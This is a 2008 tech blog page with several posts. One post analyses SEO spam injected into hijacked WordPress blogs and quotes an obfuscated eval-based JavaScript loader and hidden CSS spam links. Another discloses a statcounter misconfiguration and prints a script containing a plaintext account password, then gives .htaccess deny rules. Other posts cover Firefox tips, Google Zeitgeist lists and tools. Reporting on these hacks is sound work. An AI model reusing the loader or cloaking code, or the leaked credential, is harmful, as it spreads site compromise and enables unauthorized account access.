Being Hacked by SEO spammer is seem like a yearly events at Mattheaton.com. Matt’s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at → Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.

It’s a big embarrassment for bluehost & hostmonster hosting to have their CEO’s blog being spamride every year (since 2007) . Drilling Matt Heaton’s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.

Mattheaton Goro Spam Chronology

Wordpress.net.in GORO Spam Pattern

• All the infected sites will stop being index by archive.org few months before the spam started.
• From Nov 2007 to Jan 2008 (Right after Google Mass P3 De-rank fever) - The Blackhat Goro Spammer is targeting PR6 & PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)
• I categorize this blackhat method as Sybil Attack
  

  A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system’s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.

  - Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP)

• Goro signatures:
  1. html div with id “goro”

     <div id="goro"> <a href=">...</a> </div>
     

  2. javascript function name “getme()”

     <script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>
     

  3. Output spam on WordPress wp_footer & wp_head hook

Blackhat SEO Spamdexing Google Local Search Index

The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.

View Spamdexing Google Local Search Image

Note: A blackhat at hoqwarts ;)

ScreenGrab

• mattheaton.com Jan 28 2008 (1009 x 6576 pixels)
• brainwave-india.com Jan 28 2008 (1016 x 2306 pixels)
• Google Local Search Jan 28 2008 Spamdexing Results
• stc-israel.org.il Jan 28 2008 spamdexing page (hidden text)
• stc-israel.org.il Jan 28 2008 spamdexing page (text reveal)

Recent Update

• Feb 1, 2008 - we send a letter to matt@bluehost.com regarding this issue. Still waiting for his replies
• Feb 3, 2008 - The Blackhat Goro Spammer change their target spamhost from http://www.brainwave-india.com (PR6) to http://www.thinkingphp.org (PR6) - Felix Geisendörfer.

  <div id="goro"><a href="http://www.thinkingphp.org/?read=796 ... prescription</a></div><script type="text/javascript">function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); </script>

  thinkingphp.org blog is running on WordPress 2.3.2. We send him email regarding the Goro Spam hijack.

• Feb 8th 2008, There is no signature of Goro spam (tag with id goro) on Matt’s blog the blackhat is now using Inline CSS Position Overflow to hide the spams links ↓ redirect to zoorender.com (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.zoorender.com/?discount=1776">buying .. </div>
  

• Feb 13th 2008, Same methods as above (inline css cloacking) .
  • HTML Code shown to a Regular Browser → 32,246 characters
  • HTML Code shown to Google Bot → 34,646 characters

  redirect to blog.jensfranke.com (PR7).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://blog.jensfranke.com/?read=606">buy generic fi
  

• Feb 20th 2008, CSS Cloacking redirect to http://www.entrepreneur27.org/ (PR6).

  <div style="left: -2227px; position: absolute; top: -3337px"><a href="http://www.entrepreneur27.org/?more=1591">bad side effects of viagra</a>&nbsp;<a href="http://www.entrepreneur27.org/?more=1592"> ...
  </div>
  

• Feb 24th 2008, CSS Cloacking redirect to http://www.latenightpc.com (PR5). mattheaton-com-022408-source.txt
• Feb 26th 2008, CSS Cloacking redirect to http://www.communitynext.com/ WordPress 2.3.3 (PR6). mattheaton-com-022608-source.txt

Related Posts

• How to Removed wordpress.net.in Spam Injection
• Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

External Links

• Bluehost & Hostmonster CEO’s Blog
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
• Wikipedia → Spamdexing
• pseudo-flaw - more random wordpress blogs owned by seo spammers

Gianni Amato found a vulnerability in statcounter that can expose ip2location database log and account credentials.

The Vulnerability

The vulnerability exists in statcounters backup log inside utils directory where the file update.sh reside.

• googlecache: *.statcounter.com/utils/update.sh

Excerpt from Giani Amot:

The server where the backup’s log of the last three days are situated is badly set. The access for all directory by server is free, include “utils” directory that contains one script file called “update.sh” inside of which are situated the user and password to enter and download the database log from ip2location.com

Update.sh

cd /home/ip2location

/usr/bin/curl --data 'login=webmaster@statcounter.com&password=kOFr3VTh' 'http://www.ip2location.com/download.aspx?productcode=db6bin' > /home/ip2location/ipdb_current.bin.zip

rm /home/ip2location/ipdb_new.bin

unzip -p /home/ip2location/ipdb_current.bin.zip *.BIN > /home/ip2location/ipdb_new.bin

if [ "$?" -ne "0" ]; then

 echo "Sorry, new ip_db archive isn't valid!"

 exit 1

fi

mv /home/ip2location/ipdb_new.bin /home/ip2location/ipdb.bin

rm /home/ip2location/ipdb_current.bin.zip

/bin/cp /home/ip2location/ipdb.bin /mnt/rd/ipdb.bin

htaccess workaround

places the following .htaccess code inside statscounter /utils/ directory

#deny access to any file with *.sh filetypes
<Files ~ "^\.sh">
 Order allow,deny
 Deny from all
 Satisfy All
</Files>

#Deny request for *.log & comment files
<Files ~ "^.*\.([Ll][Oo][Gg]|[cC][oO][mM][mM][eE][nN][tT])">
 Order allow,deny
 Deny from all
 Satisfy All
</Files>

password protected directories

AuthType Basic
AuthName "restricted area"
AuthUserFile /usr/local/etc/.htpasswd-allusers
require valid-user

Note: You will need to change the AuthUserFile password file location depending on your server configurations.

External Resources

• Giani Amato → Se fossi tu a monitorare Statcounter.com?
• Giani Amato → Se fossi tu a monitorare Statcounter.com » English Translations

SinFP by Patrice AUffretGomor, is a full operating system TCP/IP stack fingerprinting. Features both Active (brute) and Passive Methods and support for IPV4 & IPV6. SinFP only send maximum of 3 standards packet to any open TCP port to get the results. It’s damn fast and transparent (send valid SYN & options).

SinFP Online demo is available at gomor.org sinfp demo. You can grab SinFP OS Stack Fingerprinting package at CPAN or Gomor.org (External Links ↓ ).

SinFP package is available for Mac (PPC), Linux (included in BackTrack Linux distro) and Windows Binaries (ActivePerl).

External Links

• Net-SinFP-2.06
• SinFP Fingerprinting Overview at gomor.org
• All package by Gomor at CPAN
• SinFP at SourceForge

Firefox 3 (beta) is amazing and much-much better than its earlier versions. But there is some minor caveat that I think is a bit annoying (In my opinion) the Autocompletion. The autocomplete max results is set to 25 by default, if there is similar results when you type in any URL in the address bar, it will stretch down quite far (and disappeared within few seconds).

This is not something that I can’t live with, but it’s really straining my eyes every now and then. So here’s a quick guide on how you can manage the auto-complete results with your own preferences, complete with visual guide.

Firefox About Config

1. First, open Firefox Browser type about:config in address bar. (optionally you may uncheck the “show this warning next time” and proceed with clicking “I’ll be careful, I promise!”. :)

Setup Firefox Advanced Preferences

2.on about:config ‘filter’ input bar, type in browser.urlbar.maxRichResults.

3. Click on browser.urlbar.maxRichResults. On the Input Prompt Window type in your prefer value. For this guide I set it to 5 (recommended settings is around 5 - 10 ).

4. Result should be similar like the below example.

5. Finished, restart your Firefox browser and test the auto-complete.

Thanks for reading, merci

Related Posts

• Firefox 2.0.0.12 Urgent Security Release

External Links

• Mozilla Firefox Help: Tips & Trick
• Google Firefox3 Autocomplete

All of these search keywords are most popular on Google Search (Global & US) for 2007.

iphone, wii, 24, transformer, hurricane dean, harry potter, blue ray, lost, ron paul, heroes, american idol, facebook, sudoku, borat, chris benoit, anna nicole smith, barack obama, Virginia Tech, Paris Hilton. That just some of it.

“Who is god, What is love & How to kiss” is one’s of the most popular search terms conduct on Google. Ohh it gets better “who is jesus?”.

Newsmakers

Popular Searches (News)

1. american idol
2. youtube
3. britney spears
4. 2007 cricket world cup
5. chris benoit
6. iphone
7. anna nicole smith
8. paris hilton
9. iran
10. vanessa hudgens

Presidential Campaign

1. ron paul
2. fred thompson
3. hillary clinton
4. barack obama
5. john edwards
6. mitt romney
7. john mccain
8. joe biden
9. bill richardson
10. rudy giuliani

Lawsuits

1. borat lawsuit
2. vonage lawsuit
3. iphone lawsuit
4. facebook lawsuit
5. jamie gold lawsuit
6. pants lawsuit
7. mcdonalds lawsuit
8. paxil lawsuit
9. riaa lawsuit
10. dell lawsuit

RIP (or rumors of)

1. anna nicole smith
2. travis barker*
3. vince mcmahon*
4. chris benoit
5. fidel castro*
6. michael jackson*
7. ryan sheckler*
8. bob barker*
9. criss angel*
10. kurt vonnegut

Fast Gainers by Quarter (U.S.)

January

1. chinese new year
2. anna nicole smith
3. irs

April

1. iphone
2. don imus
3. virginia tech

July

1. radiohead
2. pavarotti
3. red sox

October

1. vanessa hudgens
2. hurricane dean
3. tour de france

Fastest Rising

1. iphone
2. badoo
3. facebook
4. dailymotion
5. webkinz
6. youtube
7. ebuddy
8. second life
9. hi5
10. club penguin

Fastest Rising (U.S.)

1. iphone
2. webkinz
3. tmz
4. transformers
5. youtube
6. club penguin
7. myspace
8. heroes
9. facebook
10. anna nicole smith

Fastest Falling

1. world cup*
2. mozart
3. fifa
4. rebelde*
5. kazaa
6. xanga
7. webdetente
8. sudoku
9. shakira
10. mp3

ShowBiz

TV Shows

1. heroes
2. lost
3. house
4. 24
5. bones
6. jericho
7. reba
8. scrubs
9. greek
10. caveman

Movies

1. transformers
2. 300
3. the simpsons movie
4. epic movie
5. bee movie
6. harry potter
7. hairspray
8. cars
9. iron man
10. amazing grace

Lyrics

1. umbrella lyrics (rihanna)
2. soulja boy lyrics
3. bubbly lyrics (colbie caillat)

All the Rage

Console

1. wii
2. xbox
3. playstation 3

DVD format

1. blue ray
2. hd dvd

Television

1. Lcd TV
2. Plasma TV

Music

1. itunes
2. limewire
3. bittorent

 

Ringtones

1. mosquito ringtone
2. 24 ringtone
3. the office ringtone
4. silent ringtone
5. crazy frog ringtone
6. high pitch ringtone
7. final fantasy ringtone
8. ultrasonic ringtone
9. transformers ringtone
10. spider pig ringtone

Recipes

1. master cleanse recipe
2. ratatouille recipe
3. lemonade diet recipe
4. mojito recipe
5. zucchini bread recipe
6. eggplant parmesan recipe
7. dog food recipe
8. chicken salad recipe
9. meatloaf recipe
10. simple syrup recipe

Diets

1. weight watchers
2. jenny craig
3. volumetrics
4. slim fast
5. atkins diet
6. beck diet
7. ornish diet
8. zone diet
9. best life diet
10. mediterranean diet

Fitness

1. pilates
2. bikram yoga
3. spinning
4. cross fit
5. zumba
6. kettlebells
7. triathlon training
8. parkour
9. bosu
10. gym jones

Who, What, How

Who is

1. who is god
2. who is who
3. who is lookup
4. who is jesus
5. who is it
6. who is buckethead
7. who is calling
8. who is keppler
9. who is this
10. who is satan

What is…

1. what is love
2. what is autism
3. what is rss
4. what is lupus
5. what is sap
6. what is bluetooth
7. what is emo
8. what is java
9. what is hpv
10. what is gout

How to

1. how to kiss
2. how to draw
3. how to knit
4. how to hack
5. how to dance
6. how to crochet
7. how to meditate
8. how to flirt
9. how to levitate
10. how to skateboard

Sources compile from Google Zeitgeist

External Links

• Wikipedia Zeigeist
• Google Zeigeist Around The World
• Google Trends
• Google Hot Trends
• Google Current

I really lost without Firebug. Googling around I found this Firebug 1.1.0b10. Its compatible with Firefox 3.0b1, 3.0b2, 3.0b3, 3.0b4 & Latest 3.0b5 (beta 5) . Until Joe Hewitt release Firebug 1.1 (probably for firefox 3 release) You can try this Firebug 1.1 beta, download it at fireclipse. It working hu ho.

Excerpt from fireclipse

Firebug 1.1 is Firebug 1.05 by Joe Hewitt with enhancements and bug fixes by John J. Barton (IBM Almaden) and Max Stepanov (aptana)

The file is an XPI file that will add-on to Firefox as Firebug v1.1. Firefox’s updater will allow you to get new experimental versions until Firebug 1.1 is official.

Download

• Firebug Release Archive

Related Posts

• Firefox 2.0.0.12 Urgent Security Release

External Links

• Firebug 1.10b Overview
• Official Firebug
• Firebug Google Group

Google’s Matt Cutts caught on tape selling a 1st place link in Google Search for $500K.

This is a “Just For Fun” 1 minutes video on bribing Matt Cutts at recent pubcon2007

YouTube Video

This is what Matt Cuts’s has to say about getting 1st index in Google.

No one can guarantee a #1 ranking — not even me

External Links

• Matt Cutts → Tons of PubCon interviews on video and audio
• ReachTV → Interview with Matt Cutts from Google at Pubcon